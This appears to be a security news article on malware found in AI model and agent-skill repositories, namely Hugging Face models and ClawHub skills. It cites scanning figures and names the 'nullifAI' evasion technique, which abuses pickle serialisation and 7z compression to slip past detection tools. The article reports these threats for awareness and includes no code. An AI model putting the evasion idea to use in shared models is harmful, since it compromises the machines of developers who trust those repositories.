The AI industry’s model and agent skill repositories are full of malware. The infrastructure built to accelerate development is now the vector for compromising it.

Hugging Face and ClawHub Compromised: A Warning for the AI Industry

The AI industry’s model and agent skill repositories are full of malware. The infrastructure built to accelerate development is now the vector for compromising it.

TL;DR

Hugging Face, the repository hosting over a million machine learning models used by countless AI companies globally, and ClawHub, the public registry for OpenClaw’s AI agent skills, have been systematically infiltrated with hundreds of malicious entries. These range from stealing credentials to opening backdoors and hijacking AI agents for cryptocurrency mining.

The Compromises

Both platforms have been targeted by different but identical attacks leveraging the implicit trust developers place in shared repositories.

Hugging Face:

Since at least 2024, security firms JFrog and ReversingLabs have identified malicious models with hidden backdoors on Hugging Face. The problem has worsened: Protect AI, partnered with Hugging Face to scan its models, found approximately 352,000 unsafe or suspicious issues across 51,700 models. Over 100 models were discovered capable of arbitrary code execution using a technique called “nullifAI.” This exploits Python's pickle serialisation format and compresses files with 7z instead of the default ZIP format to bypass detection tools.

ClawHub:

A coordinated campaign infected ClawHub with 341 malicious AI agent skills designed for credential theft, opening reverse shells, and cryptocurrency mining.

The Impact

Security researchers have documented models establishing direct access to users' machines, executing credential theft, exfiltrating sensitive data, or downloading malware. A data scientist relying on what appears to be a legitimate model could unwittingly hand control of their machine to an attacker.

Responses

Hugging Face has partnered with JFrog and Wiz to enhance scanning capabilities. JFrog’s integration has significantly reduced false positives in malicious model detection (to 4%). Yet, Hugging Face's open architecture, while valuable to the AI community, also presents vulnerabilities.